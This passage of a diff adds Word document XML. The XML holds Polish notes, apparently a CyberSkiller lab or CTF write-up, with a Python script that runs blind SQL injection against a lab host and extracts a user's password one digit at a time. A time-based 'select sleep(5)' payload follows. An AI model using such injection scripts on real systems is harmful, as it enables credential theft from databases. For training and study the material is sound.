+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>całę</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>wyrażenie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>będzie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>wżiete</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> pod </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>uwagę</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTML-wstpniesformatowany"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:t xml:space="preserve">import </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>requests</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">URL = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6A8759"/>
+        </w:rPr>
+        <w:t>'http://10.0.58.55/?query=10.0.58.55%2F%3Fquery%3DXXXX"+union+select+password+from+users+where+username+%3D+%27CyberSkiller%27+and+password+like+%27C{}%25%27+--+b'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6A8759"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6A8759"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6A8759"/>
+        </w:rPr>
+        <w:t>''</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6A8759"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t xml:space="preserve">#search for the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>letter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>alphCharStart</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = 'A'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>numOfLetterInAlphabet</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = 26</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve"># for i in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>range</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>numOfLetterInAlphabet</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>):</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">#     </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>alphCharStart</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">#     </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>URL.format</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>alphCharStart</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>))</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">#     r = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>requests.get</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>URL.format</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>alphCharStart</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>))</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">#     </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>if</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> '</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>This</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>title</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>or</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>similar</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>does</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>exist</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>our</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>database</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>r.text</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">#         </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>alphCharStart</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">#         </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>break</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">#     </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>alphCharStart</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>chr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>(ord(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>alphCharStart</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>) + 1)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">#search for </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:t>nums</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="808080"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t xml:space="preserve">n = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6897BB"/>
+        </w:rPr>
+        <w:t>10</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6897BB"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6A8759"/>
+        </w:rPr>
+        <w:t>''</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6A8759"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:t xml:space="preserve">for </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t xml:space="preserve">k </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:t xml:space="preserve">in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="8888C6"/>
+        </w:rPr>
+        <w:t>range</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>(n):</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:t xml:space="preserve">for </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t xml:space="preserve">i </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:t xml:space="preserve">in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="8888C6"/>
+        </w:rPr>
+        <w:t>range</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6897BB"/>
+        </w:rPr>
+        <w:t>10</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>):</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">        r = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>requests.get</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>URL.format</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="8888C6"/>
+        </w:rPr>
+        <w:t>str</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>(i)))</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:t>if</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6A8759"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6A8759"/>
+        </w:rPr>
+        <w:t>This</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6A8759"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6A8759"/>
+        </w:rPr>
+        <w:t>title</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6A8759"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6A8759"/>
+        </w:rPr>
+        <w:t>or</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6A8759"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6A8759"/>
+        </w:rPr>
+        <w:t>similar</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6A8759"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6A8759"/>
+        </w:rPr>
+        <w:t>does</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6A8759"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6A8759"/>
+        </w:rPr>
+        <w:t>exist</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6A8759"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6A8759"/>
+        </w:rPr>
+        <w:t>our</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6A8759"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6A8759"/>
+        </w:rPr>
+        <w:t>database</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="6A8759"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:t xml:space="preserve">in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>r.text</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> += </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="8888C6"/>
+        </w:rPr>
+        <w:t>str</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>(i)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:t>break</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="CC7832"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="8888C6"/>
+        </w:rPr>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A9B7C6"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Podatność</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> SQL Injection </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>typu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Time Based </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId26" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hipercze"/>
+            <w:b w:val="0"/>
+            <w:bCs w:val="0"/>
+          </w:rPr>
+          <w:t>https://youtu.be/vDiP4yjhU6M</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>select sleep(5)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nagwek4"/>
+        <w:rPr>
